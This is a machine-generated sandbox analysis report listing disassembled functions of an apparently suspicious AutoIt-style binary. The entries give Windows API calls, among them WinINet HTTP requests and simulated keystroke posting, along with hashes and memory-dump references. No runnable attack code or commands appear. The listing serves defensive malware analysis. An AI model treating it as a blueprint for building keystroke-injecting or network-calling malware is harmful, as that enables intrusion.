                                                                                                                                                                                                                                                                    • Part of subcall function 00CE7567: ScreenToClient.USER32(?,?), ref: 00CE75F6
                                                                                                                                                                                                                                                                  • GetDC.USER32 ref: 00D26083
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00D26096
                                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00D260A4
                                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00D260B9
                                                                                                                                                                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00D260C1
                                                                                                                                                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00D26152
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                                                                                                                                  • String ID: U
                                                                                                                                                                                                                                                                  • API String ID: 4009187628-3372436214
                                                                                                                                                                                                                                                                  • Opcode ID: 30da486d2503c9ee6a20b481e143ec4812cb0fbf7b9480fcc3efa75bf4c6421a
                                                                                                                                                                                                                                                                  • Instruction ID: 0f2fa0a3302425ae37fb2c303489e3ff047a1ec7c318a0e5de4542c09eb0668d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 30da486d2503c9ee6a20b481e143ec4812cb0fbf7b9480fcc3efa75bf4c6421a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9571F031500355DFCF269F64E884ABA3BB1FF64328F184269ED599A2A6C730D850EF70
                                                                                                                                                                                                                                                                  Function 00D7955E Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00CE24B0
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE19CD: GetCursorPos.USER32(?), ref: 00CE19E1
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE19CD: ScreenToClient.USER32(00000000,?), ref: 00CE19FE
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE19CD: GetAsyncKeyState.USER32(00000001), ref: 00CE1A23
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE19CD: GetAsyncKeyState.USER32(00000002), ref: 00CE1A3D
                                                                                                                                                                                                                                                                  • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 00D795C7
                                                                                                                                                                                                                                                                  • ImageList_EndDrag.COMCTL32 ref: 00D795CD
                                                                                                                                                                                                                                                                  • ReleaseCapture.USER32 ref: 00D795D3
                                                                                                                                                                                                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 00D7966E
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00D79681
                                                                                                                                                                                                                                                                  • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 00D7975B
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                                                                                                                                                  • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                                                                                                                                                  • API String ID: 1924731296-2107944366
                                                                                                                                                                                                                                                                  • Opcode ID: d230d6b0ae4325c9a00a9875899dd906c56f57358a9363f6254b91527670cc04
                                                                                                                                                                                                                                                                  • Instruction ID: c0c651556dc2a30304e87a44d56bd9685cbdbd7cdd0a71300725b97f975d070c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d230d6b0ae4325c9a00a9875899dd906c56f57358a9363f6254b91527670cc04
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 17517C75104344AFDB04EF24CC56FAA77E5FF88714F400A18F99A972E1EB709948DB62
                                                                                                                                                                                                                                                                  Function 00D5CC98 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00D5CCB7
                                                                                                                                                                                                                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00D5CCDF
                                                                                                                                                                                                                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00D5CD0F
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00D5CD67
                                                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?), ref: 00D5CD7B
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00D5CD86
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3113390036-3916222277
                                                                                                                                                                                                                                                                  • Opcode ID: 8949092b18377ca2c3495bf143b12a155aeaaffaf9b6763a21c7920d375b0898
                                                                                                                                                                                                                                                                  • Instruction ID: 1ef17564c8a1a42145694e7a4d1f91d81a22de65fd07e86dd2b90da0342d8e33
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8949092b18377ca2c3495bf143b12a155aeaaffaf9b6763a21c7920d375b0898
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 71316D71510308AFDB21AF658C88AAB7BFDEF45741B14552EFC4AD6210EB34DD489B70
                                                                                                                                                                                                                                                                  Function 00D4A215 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00D255AE,?,?,Bad directive syntax error,00D7DCD0,00000000,00000010,?,?), ref: 00D4A236
                                                                                                                                                                                                                                                                  • LoadStringW.USER32(00000000,?,00D255AE,?), ref: 00D4A23D
                                                                                                                                                                                                                                                                    • Part of subcall function 00CEB329: _wcslen.LIBCMT ref: 00CEB333
                                                                                                                                                                                                                                                                  • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00D4A301
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                                                                                                                                                                                  • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                                                                                                                  • API String ID: 858772685-4153970271
                                                                                                                                                                                                                                                                  • Opcode ID: 19035ada45c6a7bda78950bacadb9b2f63189e6de8e47c48ab9e22b92448a41c
                                                                                                                                                                                                                                                                  • Instruction ID: 6dd92aacaa5737675013217b4d9b86ef27ed938f0fd77286205def78e1406ef2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 19035ada45c6a7bda78950bacadb9b2f63189e6de8e47c48ab9e22b92448a41c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4121513195035EEFCF11AF94CC46EEE7B39BF18700F044459B515650A2EB72AA58EB21
                                                                                                                                                                                                                                                                  Function 00D429EC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetParent.USER32 ref: 00D429F8
                                                                                                                                                                                                                                                                  • GetClassNameW.USER32(00000000,?,00000100), ref: 00D42A0D
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00D42A9A
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ClassMessageNameParentSend
                                                                                                                                                                                                                                                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                                                                                                                  • API String ID: 1290815626-3381328864
                                                                                                                                                                                                                                                                  • Opcode ID: d19bed6c0b6c74ea431ed8350eb607a9c228cf1d07c301db83e9f2f4143b7530
                                                                                                                                                                                                                                                                  • Instruction ID: 06f39996a4e0b9334147a65f1634e3563d3f9041034961118fbc6d1316bd1fa7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d19bed6c0b6c74ea431ed8350eb607a9c228cf1d07c301db83e9f2f4143b7530
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D611A376244306BFFA246620AC07EB6379DDF16724B640012FE09E50D1FBA1E8415534
                                                                                                                                                                                                                                                                  Function 00CE7567 Relevance: 13.8, APIs: 9, Instructions: 291COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 00CE758D
                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00CE75CE
                                                                                                                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00CE75F6
                                                                                                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 00CE773A
                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00CE775B
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Rect$Client$Window$Screen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1296646539-0
                                                                                                                                                                                                                                                                  • Opcode ID: 86a4e39b3700e0e9486facc0fa22f4bb90bc3b1572c9682f4eef26560b246705
                                                                                                                                                                                                                                                                  • Instruction ID: c338a4d115a75d21f03304b19f96b21d1d8143c6208169da45942e08f64f26b5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 86a4e39b3700e0e9486facc0fa22f4bb90bc3b1572c9682f4eef26560b246705
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E9C1593990475AEFDB10CFA9C940BEDB7B1FF18314F14851AE8A9E3250D734AA51DB60
                                                                                                                                                                                                                                                                  Function 00D1D210 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1282221369-0
                                                                                                                                                                                                                                                                  • Opcode ID: e8811aa079b44d513cf88dcd230723d79534546f9d6454f9209efcc4eb3fe8e3
                                                                                                                                                                                                                                                                  • Instruction ID: 28c71bf99b591de3ae8f1f28fac3d21950264e074d54c790185319f082775441
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e8811aa079b44d513cf88dcd230723d79534546f9d6454f9209efcc4eb3fe8e3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F61F6B1904310BFDB25AF78F8816FA7BA5DF01320B58026DE954D7281DF32998187B5
                                                                                                                                                                                                                                                                  Function 00D75B72 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00D75C24
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 00D75C65
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(?,00000005,?,00000000), ref: 00D75C6B
                                                                                                                                                                                                                                                                  • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00D75C6F
                                                                                                                                                                                                                                                                    • Part of subcall function 00D779F2: DeleteObject.GDI32(00000000), ref: 00D77A1E
                                                                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00D75CAB
                                                                                                                                                                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00D75CB8
                                                                                                                                                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00D75CEB
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00D75D25
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00D75D34
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3210457359-0
                                                                                                                                                                                                                                                                  • Opcode ID: fde35798c9765e8faa03c156a0fbe9143a011c7e8e9379706ea8943ff39dc9a8
                                                                                                                                                                                                                                                                  • Instruction ID: e44669dc9aed69f0a996c55d78b9cd9511d5a769886d9b8587cc822efb9cf35f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fde35798c9765e8faa03c156a0fbe9143a011c7e8e9379706ea8943ff39dc9a8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6751B334640B08BFEF359F14EC4ABA83B61EB04750F18C115F91DAA2E4E7B19990DB72
                                                                                                                                                                                                                                                                  Function 00CE13A6 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00D228D1
                                                                                                                                                                                                                                                                  • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00D228EA
                                                                                                                                                                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00D228FA
                                                                                                                                                                                                                                                                  • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00D22912
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00D22933
                                                                                                                                                                                                                                                                  • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00CE11F5,00000000,00000000,00000000,000000FF,00000000), ref: 00D22942
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00D2295F
                                                                                                                                                                                                                                                                  • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00CE11F5,00000000,00000000,00000000,000000FF,00000000), ref: 00D2296E
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1268354404-0
                                                                                                                                                                                                                                                                  • Opcode ID: 0aac7811efc7317f6b8f633e1b639518c19bb83c6226ddadaaebdaad42ac52df
                                                                                                                                                                                                                                                                  • Instruction ID: 69eff15c81981852d906318ad8d9b11353e54b4fb3279968b306b8d64e055a13
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0aac7811efc7317f6b8f633e1b639518c19bb83c6226ddadaaebdaad42ac52df
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D2515730640349EFDB24CF26CC45BAA7BB6EF58724F144518F956D62E0E770E990DB60
                                                                                                                                                                                                                                                                  Function 00D5CB88 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00D5CBC7
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00D5CBDA
                                                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?), ref: 00D5CBEE
                                                                                                                                                                                                                                                                    • Part of subcall function 00D5CC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00D5CCB7
                                                                                                                                                                                                                                                                    • Part of subcall function 00D5CC98: GetLastError.KERNEL32 ref: 00D5CD67
                                                                                                                                                                                                                                                                    • Part of subcall function 00D5CC98: SetEvent.KERNEL32(?), ref: 00D5CD7B
                                                                                                                                                                                                                                                                    • Part of subcall function 00D5CC98: InternetCloseHandle.WININET(00000000), ref: 00D5CD86
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 337547030-0
                                                                                                                                                                                                                                                                  • Opcode ID: aee1fe6b38513d356c894cedc72b44ed0e6a418e95b4af4ca9bb57d66b521c3f
                                                                                                                                                                                                                                                                  • Instruction ID: 2376c01b46d404b7db3a2b750fac670d4d9dc110d8e7bd43f32e44d88f5987b7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aee1fe6b38513d356c894cedc72b44ed0e6a418e95b4af4ca9bb57d66b521c3f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A7318971210701AFCF218F65CD44A7ABBB9FF04302B14552EFC9AC6620D730E858AB70
                                                                                                                                                                                                                                                                  Function 00D42EEF Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00D44393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00D443AD
                                                                                                                                                                                                                                                                    • Part of subcall function 00D44393: GetCurrentThreadId.KERNEL32 ref: 00D443B4
                                                                                                                                                                                                                                                                    • Part of subcall function 00D44393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00D42F00), ref: 00D443BB
                                                                                                                                                                                                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00D42F0A
                                                                                                                                                                                                                                                                  • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00D42F28
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00D42F2C
                                                                                                                                                                                                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00D42F36
                                                                                                                                                                                                                                                                  • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00D42F4E
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00D42F52
                                                                                                                                                                                                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00D42F5C
                                                                                                                                                                                                                                                                  • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00D42F70
